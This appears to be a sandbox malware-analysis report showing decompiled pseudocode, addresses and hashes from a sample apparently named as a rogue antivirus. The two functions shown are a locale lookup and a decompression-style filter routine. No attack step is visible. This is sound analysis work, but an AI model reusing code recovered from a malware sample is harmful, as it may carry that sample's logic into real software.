                                                                                                                                                      • String ID: EA
                                                                                                                                                      • API String ID: 0-1759796954
                                                                                                                                                      • Opcode ID: 8628abb3b80d9cb63cb5d0152fc648dc47c1fe5bfa02992019f208037f242e52
                                                                                                                                                      • Instruction ID: e36e1c60de2598ddb41f7bca5aedb0013dabc96c6f449a0bc5bfce457db8d824
                                                                                                                                                      • Opcode Fuzzy Hash: 8628abb3b80d9cb63cb5d0152fc648dc47c1fe5bfa02992019f208037f242e52
                                                                                                                                                      • Instruction Fuzzy Hash: 8CD14B72A0061ADFCF14CF58C884599B7F1FF8C318B2685ADD819AB245D731BA56CF84
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040A86C() {
                                                                                                                                                      				char _v104;
                                                                                                                                                      
                                                                                                                                                      				GetLocaleInfoA(0x400, 0xf,  &_v104, 0x64);
                                                                                                                                                      				return _v104;
                                                                                                                                                      			}




                                                                                                                                                      0x0040a87f
                                                                                                                                                      0x0040a88a

                                                                                                                                                      APIs
                                                                                                                                                      • GetLocaleInfoA.KERNEL32(00000400,0000000F,?,00000064), ref: 0040A87F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2299586839-0
                                                                                                                                                      • Opcode ID: 829ba670a0fa1757a0144cb269cf4ad3e50a0cada9b3a97f802edfc538549171
                                                                                                                                                      • Instruction ID: c13786068502227b452c93a03eb0fb89719701edabe44a7bd0f48a7f58202c8b
                                                                                                                                                      • Opcode Fuzzy Hash: 829ba670a0fa1757a0144cb269cf4ad3e50a0cada9b3a97f802edfc538549171
                                                                                                                                                      • Instruction Fuzzy Hash: 9DC08CA064434D2EE710E3A05E07FAE7EFC4700B0AF000060FB09FB0C1D1E0DA2A866A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00407E0E(void* __ecx, signed int _a4) {
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				signed int _v16;
                                                                                                                                                      				signed int _v20;
                                                                                                                                                      				signed char* _v24;
                                                                                                                                                      				signed int _v28;
                                                                                                                                                      				signed int _v32;
                                                                                                                                                      				signed int _v36;
                                                                                                                                                      				signed int _v40;
                                                                                                                                                      				signed int _v44;
                                                                                                                                                      				signed int _v48;
                                                                                                                                                      				signed int _v52;
                                                                                                                                                      				signed int _v56;
                                                                                                                                                      				intOrPtr _v60;
                                                                                                                                                      				intOrPtr _v64;
                                                                                                                                                      				intOrPtr _v68;
                                                                                                                                                      				intOrPtr _v72;
                                                                                                                                                      				intOrPtr _v76;
                                                                                                                                                      				intOrPtr _v80;
                                                                                                                                                      				signed int _v84;
                                                                                                                                                      				signed int _t227;
                                                                                                                                                      				signed int _t231;
                                                                                                                                                      				signed int _t242;
                                                                                                                                                      				signed int _t246;
                                                                                                                                                      				signed int _t247;
                                                                                                                                                      				signed int _t249;
                                                                                                                                                      				void* _t257;
                                                                                                                                                      				signed int _t260;
                                                                                                                                                      				signed int _t261;
                                                                                                                                                      				signed int _t265;
                                                                                                                                                      				signed int* _t283;
                                                                                                                                                      				signed int _t285;
                                                                                                                                                      				signed int _t286;
                                                                                                                                                      				signed int _t287;
                                                                                                                                                      				signed int _t288;
                                                                                                                                                      				signed int _t289;
                                                                                                                                                      				char _t291;
                                                                                                                                                      				signed int _t293;
                                                                                                                                                      				unsigned int _t298;
                                                                                                                                                      				void* _t299;
                                                                                                                                                      				signed int _t300;
                                                                                                                                                      				void* _t301;
                                                                                                                                                      				signed int _t302;
                                                                                                                                                      				signed int* _t304;
                                                                                                                                                      				signed int _t306;
                                                                                                                                                      				signed int _t311;
                                                                                                                                                      				signed int _t313;
                                                                                                                                                      				intOrPtr _t317;
                                                                                                                                                      				signed int _t322;
                                                                                                                                                      				signed int _t327;
                                                                                                                                                      				signed int _t328;
                                                                                                                                                      				char _t329;
                                                                                                                                                      				signed int _t330;
                                                                                                                                                      				void* _t332;
                                                                                                                                                      				signed int _t333;
                                                                                                                                                      				void* _t337;
                                                                                                                                                      				signed int _t342;
                                                                                                                                                      				signed int _t343;
                                                                                                                                                      				void* _t344;
                                                                                                                                                      				signed int _t345;
                                                                                                                                                      				void* _t346;
                                                                                                                                                      				signed int _t349;
                                                                                                                                                      				void* _t350;
                                                                                                                                                      				signed int _t355;
                                                                                                                                                      				signed int _t356;
                                                                                                                                                      				signed int _t357;
                                                                                                                                                      				signed int _t360;
                                                                                                                                                      				signed int _t361;
                                                                                                                                                      				void* _t364;
                                                                                                                                                      				signed int _t366;
                                                                                                                                                      				signed int* _t367;
                                                                                                                                                      				signed int _t368;
                                                                                                                                                      				signed char* _t369;
                                                                                                                                                      				signed int* _t370;
                                                                                                                                                      				signed int _t379;
                                                                                                                                                      				void* _t380;
                                                                                                                                                      				void* _t381;
                                                                                                                                                      				void* _t382;
                                                                                                                                                      
                                                                                                                                                      				_t330 = _a4;
                                                                                                                                                      				_t382 = _t381 - 0x50;
                                                                                                                                                      				_t364 = __ecx;
                                                                                                                                                      				if(_t330 <= 0) {
                                                                                                                                                      					L98:
                                                                                                                                                      					return _t227;
                                                                                                                                                      				}
                                                                                                                                                      				if(_t330 <= 2) {
                                                                                                                                                      					_t227 =  *(__ecx + 0x20);
                                                                                                                                                      					_t304 =  *(__ecx + 0xc);
                                                                                                                                                      					_t366 =  *(__ecx + 0x28);
                                                                                                                                                      					__eflags = _t227 - 0x3c000;
                                                                                                                                                      					if(_t227 >= 0x3c000) {
                                                                                                                                                      						L97:
                                                                                                                                                      						goto L98;
                                                                                                                                                      					}
                                                                                                                                                      					__eflags = _t227 - 4;
                                                                                                                                                      					if(_t227 < 4) {
                                                                                                                                                      						goto L97;
                                                                                                                                                      					}
                                                                                                                                                      					__eflags = _t330 - 2;
                                                                                                                                                      					_a4 = _a4 & 0x00000000;
                                                                                                                                                      					_t349 = _t227 - 4;
                                                                                                                                                      					_t332 = (_t330 & 0xffffff00 | _t330 == 0x00000002) + 0xe8;
                                                                                                                                                      					__eflags = _t349;
                                                                                                                                                      					if(_t349 <= 0) {
                                                                                                                                                      						goto L97;
                                                                                                                                                      					} else {
                                                                                                                                                      						goto L87;
                                                                                                                                                      					}
                                                                                                                                                      					do {
                                                                                                                                                      						L87:
                                                                                                                                                      						_t227 =  *_t304;
                                                                                                                                                      						_t304 =  &(_t304[0]);
                                                                                                                                                      						_a4 = _a4 + 1;
                                                                                                                                                      						_t366 = _t366 + 1;
                                                                                                                                                      						__eflags = _t227 - 0xe8;
                                                                                                                                                      						if(_t227 == 0xe8) {
                                                                                                                                                      							L89:
                                                                                                                                                      							_t227 =  *_t304;
                                                                                                                                                      							__eflags = _t227;
                                                                                                                                                      							if(_t227 >= 0) {
                                                                                                                                                      								__eflags = _t227 - 0x1000000;
                                                                                                                                                      								if(_t227 >= 0x1000000) {
                                                                                                                                                      									L95:
                                                                                                                                                      									_a4 = _a4 + 4;
                                                                                                                                                      									_t304 =  &(_t304[1]);
                                                                                                                                                      									_t366 = _t366 + 4;
                                                                                                                                                      									__eflags = _t366;
                                                                                                                                                      									goto L96;
                                                                                                                                                      								}
                                                                                                                                                      								_t227 = _t227 - _t366;
                                                                                                                                                      								__eflags = _t227;
                                                                                                                                                      								L94:
                                                                                                                                                      								 *_t304 = _t227;
                                                                                                                                                      								goto L95;
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = _t366 + _t227;
                                                                                                                                                      							if(_t366 + _t227 < 0) {
                                                                                                                                                      								goto L95;
                                                                                                                                                      							}
                                                                                                                                                      							_t227 = _t227 + 0x1000000;
                                                                                                                                                      							goto L94;
                                                                                                                                                      						}
                                                                                                                                                      						__eflags = _t227 - _t332;
                                                                                                                                                      						if(_t227 != _t332) {
                                                                                                                                                      							goto L96;
                                                                                                                                                      						}
                                                                                                                                                      						goto L89;
                                                                                                                                                      						L96:
                                                                                                                                                      						__eflags = _a4 - _t349;
                                                                                                                                                      					} while (_a4 < _t349);
                                                                                                                                                      					goto L97;
                                                                                                                                                      				}
                                                                                                                                                      				if(_t330 == 3) {
                                                                                                                                                      					_a4 =  *(__ecx + 0xc);
                                                                                                                                                      					_t227 =  *(__ecx + 0x20);
                                                                                                                                                      					__eflags = _t227 - 0x3c000;
                                                                                                                                                      					if(_t227 >= 0x3c000) {
                                                                                                                                                      						goto L97;
                                                                                                                                                      					}
                                                                                                                                                      					__eflags = _t227 - 0x15;
                                                                                                                                                      					if(_t227 < 0x15) {
                                                                                                                                                      						goto L97;
                                                                                                                                                      					}
                                                                                                                                                      					_t227 = _t227 + 0xffffffeb;
                                                                                                                                                      					_t298 =  *(__ecx + 0x28) >> 4;
                                                                                                                                                      					__eflags = _t227;
                                                                                                                                                      					if(_t227 <= 0) {
                                                                                                                                                      						goto L97;
                                                                                                                                                      					}
                                                                                                                                                      					_t231 = (_t227 - 1 >> 4) + 1;
                                                                                                                                                      					__eflags = _t231;
                                                                                                                                                      					_v48 = _t231;
                                                                                                                                                      					do {
                                                                                                                                                      						_t227 = ( *_a4 & 0x1f) - 0x10;
                                                                                                                                                      						__eflags = _t227;
                                                                                                                                                      						if(_t227 < 0) {
                                                                                                                                                      							goto L82;
                                                                                                                                                      						}
                                                                                                                                                      						_t227 =  *((intOrPtr*)(_t227 + 0x41408c));
                                                                                                                                                      						__eflags = _t227;
                                                                                                                                                      						if(_t227 == 0) {
                                                                                                                                                      							goto L82;
                                                                                                                                                      						}
                                                                                                                                                      						_t196 =  &_v32;
                                                                                                                                                      						 *_t196 = _v32 & 0x00000000;
                                                                                                                                                      						__eflags =  *_t196;
                                                                                                                                                      						_v56 = _t227 & 0x000000ff;
                                                                                                                                                      						_t350 = 0x12;
                                                                                                                                                      						do {
                                                                                                                                                      							_t227 = 1 << _v32;
                                                                                                                                                      							_t306 = _v56;
                                                                                                                                                      							__eflags = _t306 & 1;
                                                                                                                                                      							if((_t306 & 1) != 0) {
                                                                                                                                                      								_t203 = _t350 + 0x18; // 0x2a
                                                                                                                                                      								_t227 = E00407C4E(_t330, _a4, _t203, 4);
                                                                                                                                                      								__eflags = _t227 - 5;
                                                                                                                                                      								if(_t227 == 5) {
                                                                                                                                                      									__eflags = E00407C4E(_t330, _a4, _t350, 0x14) - _t298 & 0x000fffff;
                                                                                                                                                      									_t227 = E00407C9E(_t330, _a4, E00407C4E(_t330, _a4, _t350, 0x14) - _t298 & 0x000fffff, _t350, 0x14);
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      							_v32 = _v32 + 1;
                                                                                                                                                      							_t350 = _t350 + 0x29;
                                                                                                                                                      							__eflags = _t350 - 0x64;
                                                                                                                                                      						} while (_t350 <= 0x64);
                                                                                                                                                      						L82:
                                                                                                                                                      						_a4 = _a4 + 0x10;
                                                                                                                                                      						_t298 = _t298 + 1;
                                                                                                                                                      						_t211 =  &_v48;
                                                                                                                                                      						 *_t211 = _v48 - 1;
                                                                                                                                                      						__eflags =  *_t211;
                                                                                                                                                      					} while ( *_t211 != 0);
                                                                                                                                                      					goto L97;
                                                                                                                                                      				}
                                                                                                                                                      				if(_t330 == 4) {
                                                                                                                                                      					_t227 =  *(__ecx + 0x20);
                                                                                                                                                      					_t333 =  *(__ecx + 0x14);
                                                                                                                                                      					_t367 =  *(__ecx + 0xc);
                                                                                                                                                      					_t311 =  *(__ecx + 0x10) - 3;
                                                                                                                                                      					_v20 = _t227;
                                                                                                                                                      					_v56 = _t311;
                                                                                                                                                      					_v52 = _t333;
                                                                                                                                                      					_v32 = _t367;
                                                                                                                                                      					_t299 = _t367 + _t227;
                                                                                                                                                      					_t367[0xf008] = _t227;
                                                                                                                                                      					__eflags = _t227 - 0x1e000;
                                                                                                                                                      					if(_t227 >= 0x1e000) {
                                                                                                                                                      						goto L97;
                                                                                                                                                      					}
                                                                                                                                                      					__eflags = _t333;
                                                                                                                                                      					if(_t333 < 0) {
                                                                                                                                                      						goto L97;
                                                                                                                                                      					}
                                                                                                                                                      					_t132 =  &_v12;
                                                                                                                                                      					 *_t132 = _v12 & 0x00000000;
                                                                                                                                                      					__eflags =  *_t132;
                                                                                                                                                      					_v24 =  ~_t311;
                                                                                                                                                      					do {
                                                                                                                                                      						_t242 = _v20;
                                                                                                                                                      						_a4 = _a4 & 0x00000000;
                                                                                                                                                      						__eflags = _v12 - _t242;
                                                                                                                                                      						if(_v12 >= _t242) {
                                                                                                                                                      							goto L66;
                                                                                                                                                      						}
                                                                                                                                                      						_t368 = _v24;
                                                                                                                                                      						_v28 = _t368;
                                                                                                                                                      						_t369 = _t368 + _t299;
                                                                                                                                                      						_t313 = 3;
                                                                                                                                                      						_t246 = (_t242 - _v12 - 1) / _t313 + 1;
                                                                                                                                                      						__eflags = _t246;
                                                                                                                                                      						_v16 = _t246;
                                                                                                                                                      						do {
                                                                                                                                                      							__eflags = _v28 - 3;
                                                                                                                                                      							if(_v28 < 3) {
                                                                                                                                                      								L64:
                                                                                                                                                      								_t247 = _a4;
                                                                                                                                                      								goto L65;
                                                                                                                                                      							}
                                                                                                                                                      							_t351 =  *_t369 & 0x000000ff;
                                                                                                                                                      							_t250 =  *(_t369 - 3) & 0x000000ff;
                                                                                                                                                      							_v40 =  *_t369 & 0x000000ff;
                                                                                                                                                      							_v36 =  *(_t369 - 3) & 0x000000ff;
                                                                                                                                                      							_v48 = E0040A7CD(_t351 - _t250 + _a4 - _a4);
                                                                                                                                                      							_v44 = E0040A7CD(_t351 - _t250 + _a4 - _v40);
                                                                                                                                                      							_t257 = E0040A7CD(_t351 - _t250 + _a4 - _v36);
                                                                                                                                                      							_t382 = _t382 + 0xc;
                                                                                                                                                      							__eflags = _v48 - _v44;
                                                                                                                                                      							if(_v48 > _v44) {
                                                                                                                                                      								L61:
                                                                                                                                                      								__eflags = _v44 - _t257;
                                                                                                                                                      								if(_v44 > _t257) {
                                                                                                                                                      									_t247 = _v36;
                                                                                                                                                      								} else {
                                                                                                                                                      									_t247 = _v40;
                                                                                                                                                      								}
                                                                                                                                                      								goto L65;
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = _v48 - _t257;
                                                                                                                                                      							if(_v48 <= _t257) {
                                                                                                                                                      								goto L64;
                                                                                                                                                      							}
                                                                                                                                                      							goto L61;
                                                                                                                                                      							L65:
                                                                                                                                                      							_v32 = _v32 + 1;
                                                                                                                                                      							_v28 = _v28 + 3;
                                                                                                                                                      							_t249 = _t247 -  *_v32 & 0x000000ff;
                                                                                                                                                      							_t369[_v56] = _t249;
                                                                                                                                                      							_t369 =  &(_t369[3]);
                                                                                                                                                      							_t171 =  &_v16;
                                                                                                                                                      							 *_t171 = _v16 - 1;
                                                                                                                                                      							__eflags =  *_t171;
                                                                                                                                                      							_a4 = _t249;
                                                                                                                                                      						} while ( *_t171 != 0);
                                                                                                                                                      						L66:
                                                                                                                                                      						_v12 = _v12 + 1;
                                                                                                                                                      						_v24 =  &(_v24[1]);
                                                                                                                                                      						__eflags = _v12 - 3;
                                                                                                                                                      					} while (_v12 < 3);
                                                                                                                                                      					_t227 = _v52;
                                                                                                                                                      					_t337 = _v20 + 0xfffffffe;
                                                                                                                                                      					while(1) {
                                                                                                                                                      						__eflags = _t227 - _t337;
                                                                                                                                                      						if(_t227 >= _t337) {
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						_t317 =  *((intOrPtr*)(_t227 + _t299 + 1));
                                                                                                                                                      						 *((intOrPtr*)(_t227 + _t299)) =  *((intOrPtr*)(_t227 + _t299)) + _t317;
                                                                                                                                                      						 *((intOrPtr*)(_t227 + _t299 + 2)) =  *((intOrPtr*)(_t227 + _t299 + 2)) + _t317;
                                                                                                                                                      						_t227 = _t227 + 3;
                                                                                                                                                      						__eflags = _t227;
                                                                                                                                                      					}
                                                                                                                                                      					goto L97;
                                                                                                                                                      				}
                                                                                                                                                      				if(_t330 == 5) {
                                                                                                                                                      					_t355 =  *(__ecx + 0x20);
                                                                                                                                                      					_t227 =  *(__ecx + 0x10);
                                                                                                                                                      					_t370 =  *(__ecx + 0xc);
                                                                                                                                                      					_t318 = _t370 + _t355;
                                                                                                                                                      					_v44 = _t355;
                                                                                                                                                      					_v48 = _t227;
                                                                                                                                                      					_v24 = _t370;
                                                                                                                                                      					_v52 = _t370 + _t355;
                                                                                                                                                      					_t370[0xf008] = _t355;
                                                                                                                                                      					__eflags = _t355 - 0x1e000;
                                                                                                                                                      					if(_t355 >= 0x1e000) {
                                                                                                                                                      						goto L97;
                                                                                                                                                      					}
                                                                                                                                                      					_t300 = 0;
                                                                                                                                                      					__eflags = _t227;
                                                                                                                                                      					_v20 = 0;
                                                                                                                                                      					if(_t227 > 0) {
                                                                                                                                                      						goto L25;
                                                                                                                                                      						while(1) {
                                                                                                                                                      							L50:
                                                                                                                                                      							_v28 = _t260;
                                                                                                                                                      							if(__eflags >= 0) {
                                                                                                                                                      								break;
                                                                                                                                                      							}
                                                                                                                                                      							_t261 = _v36;
                                                                                                                                                      							_t356 = _t300;
                                                                                                                                                      							_t300 = _t261 - _v16;
                                                                                                                                                      							_t322 =  *_v24 & 0x000000ff;
                                                                                                                                                      							_v24 = _v24 + 1;
                                                                                                                                                      							_t342 = _v40;
                                                                                                                                                      							_v16 = _t261;
                                                                                                                                                      							_v56 = _t322;
                                                                                                                                                      							_t265 = (_t356 * _a4 + _v8 * _t300 + _v12 * _t261 + _t342 * 0x00000008 >> 0x00000003 & 0x000000ff) - _t322;
                                                                                                                                                      							 *((char*)(_v28 + _v52)) = _t265;
                                                                                                                                                      							_t318 = _t265 - _t342;
                                                                                                                                                      							_t377 = _v56 << 3;
                                                                                                                                                      							_v36 = _t265 - _t342;
                                                                                                                                                      							_v40 = _t265;
                                                                                                                                                      							_v84 = _v84 + E0040A7CD(_v56 << 3);
                                                                                                                                                      							_v80 = _v80 + E0040A7CD((_v56 << 3) - _v16);
                                                                                                                                                      							_v76 = _v76 + E0040A7CD(_v16 + (_v56 << 3));
                                                                                                                                                      							_v72 = _v72 + E0040A7CD((_v56 << 3) - _t300);
                                                                                                                                                      							_v68 = _v68 + E0040A7CD(_t377 + _t300);
                                                                                                                                                      							_v64 = _v64 + E0040A7CD(_t377 - _t356);
                                                                                                                                                      							_v60 = _v60 + E0040A7CD(_t377 + _t356);
                                                                                                                                                      							_t382 = _t382 + 0x1c;
                                                                                                                                                      							__eflags = _v32 & 0x0000001f;
                                                                                                                                                      							if((_v32 & 0x0000001f) != 0) {
                                                                                                                                                      								L49:
                                                                                                                                                      								_t260 = _v28 + _v48;
                                                                                                                                                      								_v32 = _v32 + 1;
                                                                                                                                                      								__eflags = _t260 - _v44;
                                                                                                                                                      								continue;
                                                                                                                                                      							} else {
                                                                                                                                                      								_t379 = _v84;
                                                                                                                                                      								_t357 = 0;
                                                                                                                                                      								_v84 = 0;
                                                                                                                                                      								_t327 = 1;
                                                                                                                                                      								__eflags = 1;
                                                                                                                                                      								goto L28;
                                                                                                                                                      								L30:
                                                                                                                                                      								 *_t283 =  *_t283 & 0x00000000;
                                                                                                                                                      								_t327 = _t327 + 1;
                                                                                                                                                      								__eflags = _t327 - 7;
                                                                                                                                                      								if(_t327 < 7) {
                                                                                                                                                      									L28:
                                                                                                                                                      									_t283 = _t380 + _t327 * 4 - 0x50;
                                                                                                                                                      									_t343 =  *_t283;
                                                                                                                                                      									__eflags = _t343 - _t379;
                                                                                                                                                      									if(_t343 < _t379) {
                                                                                                                                                      										_t379 = _t343;
                                                                                                                                                      										_t357 = _t327;
                                                                                                                                                      									}
                                                                                                                                                      									goto L30;
                                                                                                                                                      								} else {
                                                                                                                                                      									_t285 = _t357 - 1;
                                                                                                                                                      									__eflags = _t285;
                                                                                                                                                      									if(_t285 == 0) {
                                                                                                                                                      										__eflags = _v12 - 0xfffffff0;
                                                                                                                                                      										if(_v12 >= 0xfffffff0) {
                                                                                                                                                      											_t110 =  &_v12;
                                                                                                                                                      											 *_t110 = _v12 - 1;
                                                                                                                                                      											__eflags =  *_t110;
                                                                                                                                                      										}
                                                                                                                                                      									} else {
                                                                                                                                                      										_t286 = _t285 - 1;
                                                                                                                                                      										__eflags = _t286;
                                                                                                                                                      										if(_t286 == 0) {
                                                                                                                                                      											__eflags = _v12 - 0x10;
                                                                                                                                                      											if(_v12 < 0x10) {
                                                                                                                                                      												_v12 = _v12 + 1;
                                                                                                                                                      											}
                                                                                                                                                      										} else {
                                                                                                                                                      											_t287 = _t286 - 1;
                                                                                                                                                      											__eflags = _t287;
                                                                                                                                                      											if(_t287 == 0) {
                                                                                                                                                      												__eflags = _v8 - 0xfffffff0;
                                                                                                                                                      												if(_v8 >= 0xfffffff0) {
                                                                                                                                                      													_v8 = _v8 - 1;
                                                                                                                                                      												}
                                                                                                                                                      											} else {
                                                                                                                                                      												_t288 = _t287 - 1;
                                                                                                                                                      												__eflags = _t288;
                                                                                                                                                      												if(_t288 == 0) {
                                                                                                                                                      													__eflags = _v8 - 0x10;
                                                                                                                                                      													if(_v8 < 0x10) {
                                                                                                                                                      														_v8 = _v8 + 1;
                                                                                                                                                      													}
                                                                                                                                                      												} else {
                                                                                                                                                      													_t289 = _t288 - 1;
                                                                                                                                                      													__eflags = _t289;
                                                                                                                                                      													if(_t289 == 0) {
                                                                                                                                                      														__eflags = _a4 - 0xfffffff0;
                                                                                                                                                      														if(_a4 >= 0xfffffff0) {
                                                                                                                                                      															_a4 = _a4 - 1;
                                                                                                                                                      														}
                                                                                                                                                      													} else {
                                                                                                                                                      														__eflags = _t289 == 1;
                                                                                                                                                      														if(_t289 == 1) {
                                                                                                                                                      															__eflags = _a4 - 0x10;
                                                                                                                                                      															if(_a4 < 0x10) {
                                                                                                                                                      																_a4 = _a4 + 1;
                                                                                                                                                      															}
                                                                                                                                                      														}
                                                                                                                                                      													}
                                                                                                                                                      												}
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      									goto L49;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						_v20 = _v20 + 1;
                                                                                                                                                      						_t227 = _v20;
                                                                                                                                                      						__eflags = _t227 - _v48;
                                                                                                                                                      						if(_t227 < _v48) {
                                                                                                                                                      							_t355 = _v44;
                                                                                                                                                      							_t300 = 0;
                                                                                                                                                      							__eflags = 0;
                                                                                                                                                      							L25:
                                                                                                                                                      							_v40 = _t300;
                                                                                                                                                      							_v36 = _t300;
                                                                                                                                                      							_v16 = _t300;
                                                                                                                                                      							_v12 = _t300;
                                                                                                                                                      							_v8 = _t300;
                                                                                                                                                      							_a4 = _t300;
                                                                                                                                                      							E0040A289(_t318,  &_v84, _t300, 0x1c);
                                                                                                                                                      							_t260 = _v20;
                                                                                                                                                      							_v32 = _v32 & 0x00000000;
                                                                                                                                                      							__eflags = _t260 - _t355;
                                                                                                                                                      							goto L50;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					goto L97;
                                                                                                                                                      				}
                                                                                                                                                      				if(_t330 == 6) {
                                                                                                                                                      					_t328 =  *(__ecx + 0x20);
                                                                                                                                                      					_t227 =  *(__ecx + 0x10);
                                                                                                                                                      					_t301 = 0;
                                                                                                                                                      					_v32 = _t227;
                                                                                                                                                      					_t344 = _t328 + _t328;
                                                                                                                                                      					( *(__ecx + 0xc))[0xf008] = _t328;
                                                                                                                                                      					__eflags = _t328 - 0x1e000;
                                                                                                                                                      					if(_t328 >= 0x1e000) {
                                                                                                                                                      						goto L97;
                                                                                                                                                      					}
                                                                                                                                                      					_a4 = _a4 & 0;
                                                                                                                                                      					__eflags = _t227;
                                                                                                                                                      					if(_t227 <= 0) {
                                                                                                                                                      						goto L97;
                                                                                                                                                      					} else {
                                                                                                                                                      						goto L16;
                                                                                                                                                      					}
                                                                                                                                                      					do {
                                                                                                                                                      						L16:
                                                                                                                                                      						_t291 = 0;
                                                                                                                                                      						_t360 = _a4 + _t328;
                                                                                                                                                      						L18:
                                                                                                                                                      						__eflags = _t360 - _t344;
                                                                                                                                                      						if(_t360 < _t344) {
                                                                                                                                                      							_t345 =  *(_t364 + 0xc);
                                                                                                                                                      							_t291 = _t291 -  *((intOrPtr*)(_t345 + _t301));
                                                                                                                                                      							_t301 = _t301 + 1;
                                                                                                                                                      							 *((char*)(_t345 + _t360)) = _t291;
                                                                                                                                                      							_t360 = _t360 + _v32;
                                                                                                                                                      							__eflags = _t360;
                                                                                                                                                      							_t344 = _t328 + _t328;
                                                                                                                                                      							goto L18;
                                                                                                                                                      						}
                                                                                                                                                      						_a4 = _a4 + 1;
                                                                                                                                                      						_t227 = _a4;
                                                                                                                                                      						__eflags = _t227 - _v32;
                                                                                                                                                      					} while (_t227 < _v32);
                                                                                                                                                      					goto L97;
                                                                                                                                                      				}
                                                                                                                                                      				if(_t330 != 7) {
                                                                                                                                                      					goto L97;
                                                                                                                                                      				}
                                                                                                                                                      				_t302 =  *(__ecx + 0x20);
                                                                                                                                                      				_t346 = 0;
                                                                                                                                                      				_t361 = _t302;
                                                                                                                                                      				if(_t302 >= 0x1e000) {
                                                                                                                                                      					goto L97;
                                                                                                                                                      				}
                                                                                                                                                      				if(_t302 <= 0) {
                                                                                                                                                      					L13:
                                                                                                                                                      					 *((intOrPtr*)( *(_t364 + 0xc) + 0x3c01c)) = _t361 - _t302;
                                                                                                                                                      					_t227 =  *(_t364 + 0xc);
                                                                                                                                                      					 *(_t227 + 0x3c020) = _t302;
                                                                                                                                                      					goto L97;
                                                                                                                                                      				} else {
                                                                                                                                                      					goto L9;
                                                                                                                                                      				}
                                                                                                                                                      				do {
                                                                                                                                                      					L9:
                                                                                                                                                      					_t293 =  *(_t364 + 0xc);
                                                                                                                                                      					_t329 =  *((intOrPtr*)(_t293 + _t346));
                                                                                                                                                      					_t346 = _t346 + 1;
                                                                                                                                                      					if(_t329 == 2) {
                                                                                                                                                      						_t329 =  *((intOrPtr*)(_t293 + _t346));
                                                                                                                                                      						_t346 = _t346 + 1;
                                                                                                                                                      						if(_t329 != 2) {
                                                                                                                                                      							_t329 = _t329 + 0xe0;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					 *((char*)(_t293 + _t361)) = _t329;
                                                                                                                                                      					_t361 = _t361 + 1;
                                                                                                                                                      				} while (_t346 < _t302);
                                                                                                                                                      				goto L13;
                                                                                                                                                      			}

















































































                                                                                                                                                      0x00407e11
                                                                                                                                                      0x00407e14
                                                                                                                                                      0x00407e18
                                                                                                                                                      0x00407e1c
                                                                                                                                                      0x004082ff
                                                                                                                                                      0x00408301
                                                                                                                                                      0x00408301
                                                                                                                                                      0x00407e27
                                                                                                                                                      0x00408297
                                                                                                                                                      0x0040829a
                                                                                                                                                      0x0040829d
                                                                                                                                                      0x004082a0
                                                                                                                                                      0x004082a5
                                                                                                                                                      0x004082fd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004082fe
                                                                                                                                                      0x004082a7
                                                                                                                                                      0x004082aa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004082ac
                                                                                                                                                      0x004082b2
                                                                                                                                                      0x004082b6
                                                                                                                                                      0x004082b9
                                                                                                                                                      0x004082bc
                                                                                                                                                      0x004082be
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004082c0
                                                                                                                                                      0x004082c0
                                                                                                                                                      0x004082c0
                                                                                                                                                      0x004082c2
                                                                                                                                                      0x004082c3
                                                                                                                                                      0x004082c6
                                                                                                                                                      0x004082c7
                                                                                                                                                      0x004082c9
                                                                                                                                                      0x004082cf
                                                                                                                                                      0x004082cf
                                                                                                                                                      0x004082d1
                                                                                                                                                      0x004082d3
                                                                                                                                                      0x004082e3
                                                                                                                                                      0x004082e8
                                                                                                                                                      0x004082ee
                                                                                                                                                      0x004082ee
                                                                                                                                                      0x004082f2
                                                                                                                                                      0x004082f5
                                                                                                                                                      0x004082f5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004082f5
                                                                                                                                                      0x004082ea
                                                                                                                                                      0x004082ea
                                                                                                                                                      0x004082ec
                                                                                                                                                      0x004082ec
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004082ec
                                                                                                                                                      0x004082d8
                                                                                                                                                      0x004082da
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004082dc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004082dc
                                                                                                                                                      0x004082cb
                                                                                                                                                      0x004082cd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
